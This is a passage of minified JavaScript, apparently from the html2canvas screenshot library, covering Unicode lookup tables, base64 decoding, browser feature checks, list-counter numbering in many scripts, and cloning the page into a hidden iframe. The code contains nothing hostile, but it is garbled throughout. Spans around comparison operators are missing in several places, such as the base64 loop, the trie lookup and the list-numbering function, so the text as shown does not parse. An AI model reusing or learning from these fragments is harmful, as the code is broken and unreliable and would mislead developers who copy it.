this.data[ge=((ge=this.index[ce>>5])<<2)+(31&ce)];if(ce<=65535)return this.data[ge=((ge=this.index[2048+(ce-55296>>5)])<<2)+(31&ce)];if(ce>11)],this.data[ge=((ge=this.index[ge+=ce>>5&63])<<2)+(31&ce)];if(ce<=1114111)return this.data[this.highValueIndex]}return this.errorValue},fe}(),R0="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",ah="undefined"==typeof Uint8Array?[]:new Uint8Array(256),$m=0;$m>10),dt%1024+56320),(je+1===ge||_e.length>16384)&&(tt+=String.fromCharCode.apply(String,_e),_e.length=0)}return tt},ba=function(fe,ce){var ge=function(fe){var _e,tt,dt,_t,gt,ce=.75*fe.length,ge=fe.length,je=0;"="===fe[fe.length-1]&&(ce--,"="===fe[fe.length-2]&&ce--);var kt="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof Uint8Array&&void 0!==Uint8Array.prototype.slice?new ArrayBuffer(ce):new Array(ce),Lt=Array.isArray(kt)?kt:new Uint8Array(kt);for(_e=0;_e>4,Lt[je++]=(15&dt)<<4|_t>>2,Lt[je++]=(3&_t)<<6|63>return kt}(fe),_e=Array.isArray(ge)?function(fe){for(var ce=fe.length,ge=[],_e=0;_e=55296&&je<=56319&&ge<_e){var tt=fe.charCodeAt(ge++);56320==(64512&tt)?ce.push(((1023&je)<<10)+(1023&tt)+65536):(ce.push(je),ge--)}else ce.push(je)}return ce}(fe),ge=ce.length,_e=0,je=0,tt=ce.map(P0);return{next:function(){if(_e>=ge)return{done:!0,value:null};for(var dt="\xd7";_edt.x||Lt.y>dt.y;return dt=Lt,0===kt||Ht});return fe.body.removeChild(ce),_t}(document);return Object.defineProperty(ps,"SUPPORT_WORD_BREAKING",{value:fe}),fe},get SUPPORT_SVG_DRAWING(){var fe=function(fe){var ce=new Image,ge=fe.createElement("canvas"),_e=ge.getContext("2d");if(!_e)return!1;ce.src="data:image/svg+xml,";try{_e.drawImage(ce,0,0),ge.toDataURL()}catch(je){return!1}return!0}(document);return Object.defineProperty(ps,"SUPPORT_SVG_DRAWING",{value:fe}),fe},get SUPPORT_FOREIGNOBJECT_DRAWING(){var fe="function"==typeof Array.from&&"function"==typeof window.fetch?function(fe){var ce=fe.createElement("canvas"),ge=100;ce.width=ge,ce.height=ge;var _e=ce.getContext("2d");if(!_e)return Promise.reject(!1);_e.fillStyle="rgb(0, 255, 0)",_e.fillRect(0,0,ge,ge);var je=new Image,tt=ce.toDataURL();je.src=tt;var dt=O0(ge,ge,0,0,je);return _e.fillStyle="red",_e.fillRect(0,0,ge,ge),_C(dt).then(function(_t){_e.drawImage(_t,0,0);var gt=_e.getImageData(0,0,ge,ge).data;_e.fillStyle="red",_e.fillRect(0,0,ge,ge);var kt=fe.createElement("div");return kt.style.backgroundImage="url("+tt+")",kt.style.height="100px",S_(gt)?_C(O0(ge,ge,0,0,kt)):Promise.reject(!1)}).then(function(_t){return _e.drawImage(_t,0,0),S_(_e.getImageData(0,0,ge,ge).data)}).catch(function(){return!1})}(document):Promise.resolve(!1);return Object.defineProperty(ps,"SUPPORT_FOREIGNOBJECT_DRAWING",{value:fe}),fe},get SUPPORT_CORS_IMAGES(){var fe=void 0!==(new Image).crossOrigin;return Object.defineProperty(ps,"SUPPORT_CORS_IMAGES",{value:fe}),fe},get SUPPORT_RESPONSE_TYPE(){var fe="string"==typeof(new XMLHttpRequest).responseType;return Object.defineProperty(ps,"SUPPORT_RESPONSE_TYPE",{value:fe}),fe},get SUPPORT_CORS_XHR(){var fe="withCredentials"in new XMLHttpRequest;return Object.defineProperty(ps,"SUPPORT_CORS_XHR",{value:fe}),fe},get SUPPORT_NATIVE_TEXT_SEGMENTATION(){var fe=!("undefined"==typeof Intl||!Intl.Segmenter);return Object.defineProperty(ps,"SUPPORT_NATIVE_TEXT_SEGMENTATION",{value:fe}),fe}},Ff=function fe(ce,ge){this.text=ce,this.bounds=ge},FM=function(fe,ce){var ge=ce.ownerDocument;if(ge){var _e=ge.createElement("html2canvaswrapper");_e.appendChild(ce.cloneNode(!0));var je=ce.parentNode;if(je){je.replaceChild(_e,ce);var tt=$(fe,_e);return _e.firstChild&&je.replaceChild(_e.firstChild,_e),tt}}return I.EMPTY},gC=function(fe,ce,ge){var _e=fe.ownerDocument;if(!_e)throw new Error("Node has no owner document");var je=_e.createRange();return je.setStart(fe,ce),je.setEnd(fe,ce+ge),je},im=function(fe){if(ps.SUPPORT_NATIVE_TEXT_SEGMENTATION){var ce=new Intl.Segmenter(void 0,{granularity:"grapheme"});return Array.from(ce.segment(fe)).map(function(ge){return ge.segment})}return function(fe){for(var _e,ce=Jm(fe),ge=[];!(_e=ce.next()).done;)_e.value&&ge.push(_e.value.slice());return ge}(fe)},CC=function(fe,ce){return 0!==ce.letterSpacing?im(fe):function(fe,ce){if(ps.SUPPORT_NATIVE_TEXT_SEGMENTATION){var ge=new Intl.Segmenter(void 0,{granularity:"word"});return Array.from(ge.segment(fe)).map(function(_e){return _e.segment})}return k_(fe,ce)}(fe,ce)},Er=[32,160,4961,65792,65793,4153,4241],k_=function(fe,ce){for(var je,ge=function(fe,ce){var ge=E(fe),_e=co(ge,ce),je=_e[0],tt=_e[1],dt=_e[2],_t=ge.length,gt=0,kt=0;return{next:function(){if(kt>=_t)return{done:!0,value:null};for(var Lt=Pt;kt<_t&&(Lt=Va(ge,tt,je,++kt,dt))===Pt;);if(Lt!==Pt||kt===_t){var Ht=new io(ge,Lt,gt,kt);return gt=kt,{value:Ht,done:!1}}return{done:!0,value:null}}}}(fe,{lineBreak:ce.lineBreak,wordBreak:"break-word"===ce.overflowWrap?"break-word":ce.wordBreak}),_e=[],tt=function(){if(je.value){var dt=je.value.slice(),_t=E(dt),gt="";_t.forEach(function(kt){-1===Er.indexOf(kt)?gt+=C(kt):(gt.length&&_e.push(gt),_e.push(C(kt)),gt="")}),gt.length&&_e.push(gt)}};!(je=ge.next()).done;)tt();return _e},oh=function fe(ce,ge,_e){this.text=BM(ge.data,_e.textTransform),this.textBounds=function(fe,ce,ge,_e){var je=CC(ce,ge),tt=[],dt=0;return je.forEach(function(_t){if(ge.textDecorationLine.length||_t.trim().length>0)if(ps.SUPPORT_RANGE_BOUNDS){var gt=gC(_e,dt,_t.length).getClientRects();if(gt.length>1){var kt=im(_t),Lt=0;kt.forEach(function(ui){tt.push(new Ff(ui,I.fromDOMRectList(fe,gC(_e,Lt+dt,ui.length).getClientRects()))),Lt+=ui.length})}else tt.push(new Ff(_t,I.fromDOMRectList(fe,gt)))}else{var Ht=_e.splitText(_t.length);tt.push(new Ff(_t,FM(fe,_e))),_e=Ht}else ps.SUPPORT_RANGE_BOUNDS||(_e=_e.splitText(_t.length));dt+=_t.length}),tt}(ce,this.text,_e,ge)},BM=function(fe,ce){switch(ce){case 1:return fe.toLowerCase();case 3:return fe.replace(yC,ac);case 2:return fe.toUpperCase();default:return fe}},yC=/(^|\s|:|-|\(|\))([a-z])/g,ac=function(fe,ce,ge){return fe.length>0?ce+ge.toUpperCase():fe},Wc=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je.src=_e.currentSrc||_e.src,je.intrinsicWidth=_e.naturalWidth,je.intrinsicHeight=_e.naturalHeight,je.context.cache.addImage(je.src),je}return de(ce,fe),ce}(fl),P_=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je.canvas=_e,je.intrinsicWidth=_e.width,je.intrinsicHeight=_e.height,je}return de(ce,fe),ce}(fl),rh=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this,tt=new XMLSerializer,dt=$(ge,_e);return _e.setAttribute("width",dt.width+"px"),_e.setAttribute("height",dt.height+"px"),je.svg="data:image/svg+xml,"+encodeURIComponent(tt.serializeToString(_e)),je.intrinsicWidth=_e.width.baseVal.value,je.intrinsicHeight=_e.height.baseVal.value,je.context.cache.addImage(je.svg),je}return de(ce,fe),ce}(fl),hd=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je.value=_e.value,je}return de(ce,fe),ce}(fl),Zm=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je.start=_e.start,je.reversed="boolean"==typeof _e.reversed&&!0===_e.reversed,je}return de(ce,fe),ce}(fl),O_=[{type:15,flags:0,unit:"px",number:3}],N_=[{type:16,flags:0,number:50}],sh="checkbox",_s="radio",ch="password",Cl=707406591,L_=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;switch(je.type=_e.type.toLowerCase(),je.checked=_e.checked,je.value=function(fe){var ce=fe.type===ch?new Array(fe.value.length+1).join("\u2022"):fe.value;return 0===ce.length?fe.placeholder||"":ce}(_e),(je.type===sh||je.type===_s)&&(je.styles.backgroundColor=3739148031,je.styles.borderTopColor=je.styles.borderRightColor=je.styles.borderBottomColor=je.styles.borderLeftColor=2779096575,je.styles.borderTopWidth=je.styles.borderRightWidth=je.styles.borderBottomWidth=je.styles.borderLeftWidth=1,je.styles.borderTopStyle=je.styles.borderRightStyle=je.styles.borderBottomStyle=je.styles.borderLeftStyle=1,je.styles.backgroundClip=[0],je.styles.backgroundOrigin=[0],je.bounds=function(fe){return fe.width>fe.height?new I(fe.left+(fe.width-fe.height)/2,fe.top,fe.height,fe.height):fe.width0)ge.textNodes.push(new oh(fe,je,ge.styles));else if(pi(je))if(z_(je)&&je.assignedNodes)je.assignedNodes().forEach(function(_t){return ir(fe,_t,ge,_e)});else{var dt=Se(fe,je);dt.styles.isVisible()&&(nt(je,dt,_e)?dt.flags|=4:Dt(dt.styles)&&(dt.flags|=2),-1!==bC.indexOf(je.tagName)&&(dt.flags|=8),ge.elements.push(dt),je.shadowRoot?ir(fe,je.shadowRoot,dt,_e):!dh(je)&&!Ao(je)&&!mh(je)&&ir(fe,je,dt,_e))}},Se=function(fe,ce){return gc(ce)?new Wc(fe,ce):Fc(ce)?new P_(fe,ce):Ao(ce)?new rh(fe,ce):Ya(ce)?new hd(fe,ce):ca(ce)?new Zm(fe,ce):ka(ce)?new L_(fe,ce):mh(ce)?new fd(fe,ce):dh(ce)?new N0(fe,ce):Po(ce)?new lh(fe,ce):new fl(fe,ce)},Ce=function(fe,ce){var ge=Se(fe,ce);return ge.flags|=4,ir(fe,ce,ge,ge),ge},nt=function(fe,ce,ge){return ce.styles.isPositionedWithZIndex()||ce.styles.opacity<1||ce.styles.isTransformed()||sr(fe)&&ge.styles.isTransparent()},Dt=function(fe){return fe.isPositioned()||fe.isFloating()},di=function(fe){return fe.nodeType===Node.TEXT_NODE},pi=function(fe){return fe.nodeType===Node.ELEMENT_NODE},Hi=function(fe){return pi(fe)&&void 0!==fe.style&&!_a(fe)},_a=function(fe){return"object"==typeof fe.className},Ya=function(fe){return"LI"===fe.tagName},ca=function(fe){return"OL"===fe.tagName},ka=function(fe){return"INPUT"===fe.tagName},Ao=function(fe){return"svg"===fe.tagName},sr=function(fe){return"BODY"===fe.tagName},Fc=function(fe){return"CANVAS"===fe.tagName},At=function(fe){return"VIDEO"===fe.tagName},gc=function(fe){return"IMG"===fe.tagName},Po=function(fe){return"IFRAME"===fe.tagName},Vf=function(fe){return"STYLE"===fe.tagName},dh=function(fe){return"TEXTAREA"===fe.tagName},mh=function(fe){return"SELECT"===fe.tagName},z_=function(fe){return"SLOT"===fe.tagName},uh=function(fe){return fe.tagName.indexOf("-")>0},Cc=function(){function fe(){this.counters={}}return fe.prototype.getCounterValue=function(ce){var ge=this.counters[ce];return ge&&ge.length?ge[ge.length-1]:1},fe.prototype.getCounterValues=function(ce){return this.counters[ce]||[]},fe.prototype.pop=function(ce){var ge=this;ce.forEach(function(_e){return ge.counters[_e].pop()})},fe.prototype.parse=function(ce){var ge=this,_e=ce.counterIncrement,je=ce.counterReset,tt=!0;null!==_e&&_e.forEach(function(_t){var gt=ge.counters[_t.counter];gt&&0!==_t.increment&&(tt=!1,gt.length||gt.push(1),gt[Math.max(0,gt.length-1)]+=_t.increment)});var dt=[];return tt&&je.forEach(function(_t){var gt=ge.counters[_t.counter];dt.push(_t.counter),gt||(gt=ge.counters[_t.counter]=[]),gt.push(_t.reset)}),dt},fe}(),MC={integers:[1e3,900,500,400,100,90,50,40,10,9,5,4,1],values:["M","CM","D","CD","C","XC","L","XL","X","IX","V","IV","I"]},Vc={integers:[9e3,8e3,7e3,6e3,5e3,4e3,3e3,2e3,1e3,900,800,700,600,500,400,300,200,100,90,80,70,60,50,40,30,20,10,9,8,7,6,5,4,3,2,1],values:["\u0554","\u0553","\u0552","\u0551","\u0550","\u054f","\u054e","\u054d","\u054c","\u054b","\u054a","\u0549","\u0548","\u0547","\u0546","\u0545","\u0544","\u0543","\u0542","\u0541","\u0540","\u053f","\u053e","\u053d","\u053c","\u053b","\u053a","\u0539","\u0538","\u0537","\u0536","\u0535","\u0534","\u0533","\u0532","\u0531"]},eE={integers:[1e4,9e3,8e3,7e3,6e3,5e3,4e3,3e3,2e3,1e3,400,300,200,100,90,80,70,60,50,40,30,20,19,18,17,16,15,10,9,8,7,6,5,4,3,2,1],values:["\u05d9\u05f3","\u05d8\u05f3","\u05d7\u05f3","\u05d6\u05f3","\u05d5\u05f3","\u05d4\u05f3","\u05d3\u05f3","\u05d2\u05f3","\u05d1\u05f3","\u05d0\u05f3","\u05ea","\u05e9","\u05e8","\u05e7","\u05e6","\u05e4","\u05e2","\u05e1","\u05e0","\u05de","\u05dc","\u05db","\u05d9\u05d8","\u05d9\u05d7","\u05d9\u05d6","\u05d8\u05d6","\u05d8\u05d5","\u05d9","\u05d8","\u05d7","\u05d6","\u05d5","\u05d4","\u05d3","\u05d2","\u05d1","\u05d0"]},UM={integers:[1e4,9e3,8e3,7e3,6e3,5e3,4e3,3e3,2e3,1e3,900,800,700,600,500,400,300,200,100,90,80,70,60,50,40,30,20,10,9,8,7,6,5,4,3,2,1],values:["\u10f5","\u10f0","\u10ef","\u10f4","\u10ee","\u10ed","\u10ec","\u10eb","\u10ea","\u10e9","\u10e8","\u10e7","\u10e6","\u10e5","\u10e4","\u10f3","\u10e2","\u10e1","\u10e0","\u10df","\u10de","\u10dd","\u10f2","\u10dc","\u10db","\u10da","\u10d9","\u10d8","\u10d7","\u10f1","\u10d6","\u10d5","\u10d4","\u10d3","\u10d2","\u10d1","\u10d0"]},pd=function(fe,ce,ge,_e,je,tt){return fege?V_(fe,je,tt.length>0):_e.integers.reduce(function(dt,_t,gt){for(;fe>=_t;)fe-=_t,dt+=_e.values[gt];return dt},"")+tt},W_=function(fe,ce,ge,_e){var je="";do{ge||fe--,je=_e(fe)+je,fe/=ce}while(fe*ce>=ce);return je},xr=function(fe,ce,ge,_e,je){var tt=ge-ce+1;return(fe<0?"-":"")+(W_(Math.abs(fe),tt,_e,function(dt){return C(Math.floor(dt%tt)+ce)})+je)},hh=function(fe,ce,ge){void 0===ge&&(ge=". ");var _e=ce.length;return W_(Math.abs(fe),_e,!1,function(je){return ce[Math.floor(je%_e)]})+ge},tu=function(fe,ce,ge,_e,je,tt){if(fe<-9999||fe>9999)return V_(fe,4,je.length>0);var dt=Math.abs(fe),_t=je;if(0===dt)return ce[0]+_t;for(var gt=0;dt>0&><=4;gt++){var kt=dt%10;0===kt&&Tr(tt,1)&&""!==_t?_t=ce[kt]+_t:kt>1||1===kt&&0===gt||1===kt&&1===gt&&Tr(tt,2)||1===kt&&1===gt&&Tr(tt,4)&&fe>100||1===kt&>>1&&Tr(tt,8)?_t=ce[kt]+(gt>0?ge[gt-1]:"")+_t:1===kt&>>0&&(_t=ge[gt-1]+_t),dt=Math.floor(dt/10)}return(fe<0?_e:"")+_t},AC="\ub9c8\uc774\ub108\uc2a4",V_=function(fe,ce,ge){var _e=ge?". ":"",je=ge?"\u3001":"",tt=ge?", ":"",dt=ge?" ":"";switch(ce){case 0:return"\u2022"+dt;case 1:return"\u25e6"+dt;case 2:return"\u25fe"+dt;case 5:var _t=xr(fe,48,57,!0,_e);return _t.length<4?"0"+_t:_t;case 4:return hh(fe,"\u3007\u4e00\u4e8c\u4e09\u56db\u4e94\u516d\u4e03\u516b\u4e5d",je);case 6:return pd(fe,1,3999,MC,3,_e).toLowerCase();case 7:return pd(fe,1,3999,MC,3,_e);case 8:return xr(fe,945,969,!1,_e);case 9:return xr(fe,97,122,!1,_e);case 10:return xr(fe,65,90,!1,_e);case 11:return xr(fe,1632,1641,!0,_e);case 12:case 49:return pd(fe,1,9999,Vc,3,_e);case 35:return pd(fe,1,9999,Vc,3,_e).toLowerCase();case 13:return xr(fe,2534,2543,!0,_e);case 14:case 30:return xr(fe,6112,6121,!0,_e);case 15:return hh(fe,"\u5b50\u4e11\u5bc5\u536f\u8fb0\u5df3\u5348\u672a\u7533\u9149\u620c\u4ea5",je);case 16:return hh(fe,"\u7532\u4e59\u4e19\u4e01\u620a\u5df1\u5e9a\u8f9b\u58ec\u7678",je);case 17:case 48:return tu(fe,"\u96f6\u4e00\u4e8c\u4e09\u56db\u4e94\u516d\u4e03\u516b\u4e5d","\u5341\u767e\u5343\u842c","\u8ca0",je,14);case 47:return tu(fe,"\u96f6\u58f9\u8cb3\u53c3\u8086\u4f0d\u9678\u67d2\u634c\u7396","\u62fe\u4f70\u4edf\u842c","\u8ca0",je,15);case 42:return tu(fe,"\u96f6\u4e00\u4e8c\u4e09\u56db\u4e94\u516d\u4e03\u516b\u4e5d","\u5341\u767e\u5343\u842c","\u8d1f",je,14);case 41:return tu(fe,"\u96f6\u58f9\u8d30\u53c1\u8086\u4f0d\u9646\u67d2\u634c\u7396","\u62fe\u4f70\u4edf\u842c","\u8d1f",je,15);case 26:return tu(fe,"\u3007\u4e00\u4e8c\u4e09\u56db\u4e94\u516d\u4e03\u516b\u4e5d","\u5341\u767e\u5343\u4e07","\u30de\u30a4\u30ca\u30b9",je,0);case 25:return tu(fe,"\u96f6\u58f1\u5f10\u53c2\u56db\u4f0d\u516d\u4e03\u516b\u4e5d","\u62fe\u767e\u5343\u4e07","\u30de\u30a4\u30ca\u30b9",je,7);case 31:return tu(fe,"\uc601\uc77c\uc774\uc0bc\uc0ac\uc624\uc721\uce60\ud314\uad6c","\uc2ed\ubc31\ucc9c\ub9cc",AC,tt,7);case 33:return tu(fe,"\u96f6\u4e00\u4e8c\u4e09\u56db\u4e94\u516d\u4e03\u516b\u4e5d","\u5341\u767e\u5343\u842c",AC,tt,0);case 32:return tu(fe,"\u96f6\u58f9\u8cb3\u53c3\u56db\u4e94\u516d\u4e03\u516b\u4e5d","\u62fe\u767e\u5343",AC,tt,7);case 18:return xr(fe,2406,2415,!0,_e);case 20:return pd(fe,1,19999,UM,3,_e);case 21:return xr(fe,2790,2799,!0,_e);case 22:return xr(fe,2662,2671,!0,_e);case 22:return pd(fe,1,10999,eE,3,_e);case 23:return hh(fe,"\u3042\u3044\u3046\u3048\u304a\u304b\u304d\u304f\u3051\u3053\u3055\u3057\u3059\u305b\u305d\u305f\u3061\u3064\u3066\u3068\u306a\u306b\u306c\u306d\u306e\u306f\u3072\u3075\u3078\u307b\u307e\u307f\u3080\u3081\u3082\u3084\u3086\u3088\u3089\u308a\u308b\u308c\u308d\u308f\u3090\u3091\u3092\u3093");case 24:return hh(fe,"\u3044\u308d\u306f\u306b\u307b\u3078\u3068\u3061\u308a\u306c\u308b\u3092\u308f\u304b\u3088\u305f\u308c\u305d\u3064\u306d\u306a\u3089\u3080\u3046\u3090\u306e\u304a\u304f\u3084\u307e\u3051\u3075\u3053\u3048\u3066\u3042\u3055\u304d\u3086\u3081\u307f\u3057\u3091\u3072\u3082\u305b\u3059");case 27:return xr(fe,3302,3311,!0,_e);case 28:return hh(fe,"\u30a2\u30a4\u30a6\u30a8\u30aa\u30ab\u30ad\u30af\u30b1\u30b3\u30b5\u30b7\u30b9\u30bb\u30bd\u30bf\u30c1\u30c4\u30c6\u30c8\u30ca\u30cb\u30cc\u30cd\u30ce\u30cf\u30d2\u30d5\u30d8\u30db\u30de\u30df\u30e0\u30e1\u30e2\u30e4\u30e6\u30e8\u30e9\u30ea\u30eb\u30ec\u30ed\u30ef\u30f0\u30f1\u30f2\u30f3",je);case 29:return hh(fe,"\u30a4\u30ed\u30cf\u30cb\u30db\u30d8\u30c8\u30c1\u30ea\u30cc\u30eb\u30f2\u30ef\u30ab\u30e8\u30bf\u30ec\u30bd\u30c4\u30cd\u30ca\u30e9\u30e0\u30a6\u30f0\u30ce\u30aa\u30af\u30e4\u30de\u30b1\u30d5\u30b3\u30a8\u30c6\u30a2\u30b5\u30ad\u30e6\u30e1\u30df\u30b7\u30f1\u30d2\u30e2\u30bb\u30b9",je);case 34:return xr(fe,3792,3801,!0,_e);case 37:return xr(fe,6160,6169,!0,_e);case 38:return xr(fe,4160,4169,!0,_e);case 39:return xr(fe,2918,2927,!0,_e);case 40:return xr(fe,1776,1785,!0,_e);case 43:return xr(fe,3046,3055,!0,_e);case 44:return xr(fe,3174,3183,!0,_e);case 45:return xr(fe,3664,3673,!0,_e);case 46:return xr(fe,3872,3881,!0,_e);default:return xr(fe,48,57,!0,_e)}},GM="data-html2canvas-ignore",B_=function(){function fe(ce,ge,_e){if(this.context=ce,this.options=_e,this.scrolledElements=[],this.referenceElement=ge,this.counters=new Cc,this.quoteDepth=0,!ge.ownerDocument)throw new Error("Cloned element does not have an owner document");this.documentElement=this.cloneNode(ge.ownerDocument.documentElement,!1)}return fe.prototype.toIFrame=function(ce,ge){var _e=this,je=iE(ce,ge);if(!je.contentWindow)return Promise.reject("Unable to find iframe window");var tt=ce.defaultView.pageXOffset,dt=ce.defaultView.pageYOffset,_t=je.contentWindow,gt=_t.document,kt=QM(je).then(function(){return j(_e,void 0,void 0,function(){var Lt,Ht;return Q(this,function(ui){switch(ui.label){case 0:return this.scrolledElements.forEach(L0),_t&&(_t.scrollTo(ge.left,ge.top),/(iPad|iPhone|iPod)/g.test(navigator.userAgent)&&(_t.scrollY!==ge.top||_t.scrollX!==ge.left)&&(this.context.logger.warn("Unable to restore scroll position for cloned document"),this.context.windowBounds=this.context.windowBounds.add(_t.scrollX-ge.left,_t.scrollY-ge.top,0,0))),Lt=this.options.onclone,void 0===(Ht=this.clonedReferenceElement)?[2,Promise.reject("Error finding the "+this.referenceElement.nodeName+" in the cloned document")]:gt.fonts&>.fonts.ready?[4,gt.fonts.ready]:[3,2];case 1:ui.sent(),ui.label=2;case 2:return/(AppleWebKit)/g.test(navigator.userAgent)?[4,z7(gt)]:[3,4];case 3:ui.sent(),ui.label=4;case 4:return"function"==typeof Lt?[2,Promise.resolve().then(function(){return Lt(gt,Ht)}).then(function(){return je})]:[2,je]}})})});return gt.open(),gt.write(aE(document.doctype)+""),$M(this.referenceElement.ownerDocument,tt,dt),gt.replaceChild(gt.adoptNode(this.documentElement),gt.documentElement),gt.close(),kt},fe.prototype.createElementClone=function(ce){if(Of(ce,2),Fc(ce))return this.createCanvasClone(ce);if(At(ce))return this.createVideoClone(ce);if(Vf(ce))return this.createStyleClone(ce);var ge=ce.cloneNode(!1);return gc(ge)&&(gc(ce)&&ce.currentSrc&&ce.currentSrc!==ce.src&&(ge.src=ce.currentSrc,ge.srcset=""),"lazy"===ge.loading&&(ge.loading="eager")),uh(ge)?this.createCustomElementClone(ge):ge},fe.prototype.createCustomElementClone=function(ce){var ge=document.createElement("html2canvascustomelement");return H_(ce.style,ge),ge},fe.prototype.createStyleClone=function(ce){try{var ge=ce.sheet;if(ge&&ge.cssRules){var _e=[].slice.call(ge.cssRules,0).reduce(function(tt,dt){return dt&&"string"==typeof dt.cssText?tt+dt.cssText:tt},""),je=ce.cloneNode(!1);return je.textContent=_e,je}}catch(tt){if(this.context.logger.error("Unable to access cssRules property",tt),"SecurityError"!==tt.name)throw tt}return ce.cloneNode(!1)},fe.prototype.createCanvasClone=function(ce){var ge;if(this.options.inlineImages&&ce.ownerDocument){var _e=ce.ownerDocument.createElement("img");try{return _e.src=ce.toDataURL(),_e}catch(kt){this.context.logger.info("Unable to inline canvas contents, canvas is tainted",ce)}}var je=ce.cloneNode(!1);try{je.width=ce.width,je.height=ce.height;var tt=ce.getContext("2d"),dt=je.getContext("2d");if(dt)if(!this.options.allowTaint&&tt)dt.putImageData(tt.getImageData(0,0,ce.width,ce.height),0,0);else{var _t=null!==(ge=ce.getContext("webgl2"))&&void 0!==ge?ge:ce.getContext("webgl");if(_t){var gt=_t.getContextAttributes();!1===(null==gt?void 0:gt.preserveDrawingBuffer)&&this.context.logger.warn("Unable to clone WebGL context as it has preserveDrawingBuffer=false",ce)}dt.drawImage(ce,0,0)}return je}catch(kt){this.context.logger.info("Unable to clone canvas as it is tainted",ce)}return je},fe.prototype.createVideoClone=function(ce){var ge=ce.ownerDocument.createElement("canvas");ge.width=ce.offsetWidth,ge.height=ce.offsetHeight;var _e=ge.getContext("2d");try{return _e&&(_e.drawImage(ce,0,0,ge.width,ge.height),this.options.allowTaint||_e.getImageData(0,0,ge.width,ge.height)),ge}catch(tt){this.context.logger.info("Unable to clone video as it is tainted",ce)}var je=ce.ownerDocument.createElement("canvas");return je.width=ce.offsetWidth,je.height=ce.offsetHeight,je},fe.prototype.appendChildNode=function(ce,ge,_e){(!pi(ge)||!function(fe){return"SCRIPT"===fe.tagName}(ge)&&!ge.hasAttribute(GM)&&("function"!=typeof this.options.ignoreElements||!this.options.ignoreElements(ge)))&&(!this.options.copyStyles||!pi(ge)||!Vf(ge))&&ce.appendChild(this.cloneNode(ge,_e))},fe.prototype.cloneChildNodes=function(ce,ge,_e){for(var je=this,tt=ce.shadowRoot?ce.shadowRoot.firstChild:ce.firstChild;tt;tt=tt.nextSibling)if(pi(tt)&&z_(tt)&&"function"==typeof tt.assignedNodes){var dt=tt.assignedNodes();dt.length&&dt.forEach(function(_t){return je.appendChildNode(ge,_t,_e)})}else this.appendChildNode(ge,tt,_e)},fe.prototype.cloneNode=function(ce,ge){if(di(ce))return document.createTextNode(ce.data);if(!ce.ownerDocument)return ce.cloneNode(!1);var _e=ce.ownerDocument.defaultView;if(_e&&pi(ce)&&(Hi(ce)||_a(ce))){var je=this.createElementClone(ce);je.style.transitionProperty="none";var tt=_e.getComputedStyle(ce),dt=_e.getComputedStyle(ce,":before"),_t=_e.getComputedStyle(ce,":after");this.referenceElement===ce&&Hi(je)&&(this.clonedReferenceElement=je),sr(je)&&z0(je);var gt=this.counters.parse(new Ju(this.context,tt)),kt=this.resolvePseudoContent(ce,je,dt,fh.BEFORE);uh(ce)&&(ge=!0),At(ce)||this.cloneChildNodes(ce,je,ge),kt&&je.insertBefore(kt,je.firstChild);var Lt=this.resolvePseudoContent(ce,je,_t,fh.AFTER);return Lt&&je.appendChild(Lt),this.counters.pop(gt),(tt&&(this.options.copyStyles||_a(ce))&&!Po(ce)||ge)&&H_(tt,je),(0!==ce.scrollTop||0!==ce.scrollLeft)&&this.scrolledElements.push([je,ce.scrollLeft,ce.scrollTop]),(dh(ce)||mh(ce))&&(dh(je)||mh(je))&&(je.value=ce.value),je}return ce.cloneNode(!1)},fe.prototype.resolvePseudoContent=function(ce,ge,_e,je){var tt=this;if(_e){var dt=_e.content,_t=ge.ownerDocument;if(_t&&dt&&"none"!==dt&&"-moz-alt-content"!==dt&&"none"!==_e.display){this.counters.parse(new Ju(this.context,_e));var gt=new dC(this.context,_e),kt=_t.createElement("html2canvaspseudoelement");H_(_e,kt),gt.content.forEach(function(Ht){if(0===Ht.type)kt.appendChild(_t.createTextNode(Ht.value));else if(22===Ht.type){var ui=_t.createElement("img");ui.src=Ht.value,ui.style.opacity="1",kt.appendChild(ui)}else if(18===Ht.type){if("attr"===Ht.name){var Ki=Ht.values.filter(tn);Ki.length&&kt.appendChild(_t.createTextNode(ce.getAttribute(Ki[0].value)||""))}else if("counter"===Ht.name){var Ni=Ht.values.filter(Wl),dn=Ni[1];if((Ui=Ni[0])&&tn(Ui)){var ta=tt.counters.getCounterValue(Ui.value),na=dn&&tn(dn)?Sf.parse(tt.context,dn.value):3;kt.appendChild(_t.createTextNode(V_(ta,na,!1)))}}else if("counters"===Ht.name){var Ui,To=Ht.values.filter(Wl),Mn=To[1];if(dn=To[2],(Ui=To[0])&&tn(Ui)){var qa=tt.counters.getCounterValues(Ui.value),Qi=dn&&tn(dn)?Sf.parse(tt.context,dn.value):3,ro=Mn&&0===Mn.type?Mn.value:"",Yn=qa.map(function(qc){return V_(qc,Qi,!1)}).join(ro);kt.appendChild(_t.createTextNode(Yn))}}}else if(20===Ht.type)switch(Ht.value){case"open-quote":kt.appendChild(_t.createTextNode(rr(gt.quotes,tt.quoteDepth++,!0)));break;case"close-quote":kt.appendChild(_t.createTextNode(rr(gt.quotes,--tt.quoteDepth,!1)));break;default:kt.appendChild(_t.createTextNode(Ht.value))}}),kt.className=EC+" "+DC;var Lt=je===fh.BEFORE?" "+EC:" "+DC;return _a(ge)?ge.className.baseValue+=Lt:ge.className+=Lt,kt}}},fe.destroy=function(ce){return!!ce.parentNode&&(ce.parentNode.removeChild(ce),!0)},fe}(),fh=(()=>{return(fe=fh||(fh={}))[fe.BEFORE=0]="BEFORE",fe[fe.AFTER=1]="AFTER",fh;var fe})(),iE=function(fe,ce){var ge=fe.createElement("iframe");return ge.className="html2canvas-container",ge.style.visibility="hidden",ge.style.position="fixed",ge.style.left="-10000px",ge.style.top="0px",ge.style.border="0",ge.width=ce.width.toString(),ge.height=ce.height.toString(),ge.scrolling="no",ge.setAttribute(GM,"true"),fe.body.appendChild(ge),ge},jM=function(fe){return new Promise(function(ce){fe.complete?ce():fe.src?(fe.onload=ce,fe.onerror=ce):ce()})},z7=function(fe){return Promise.all([].slice.call(fe.images,0).map(jM))},QM=function(fe){return new Promise(function(ce,ge){var _e=fe.contentWindow;if(!_e)return ge("No window assigned for 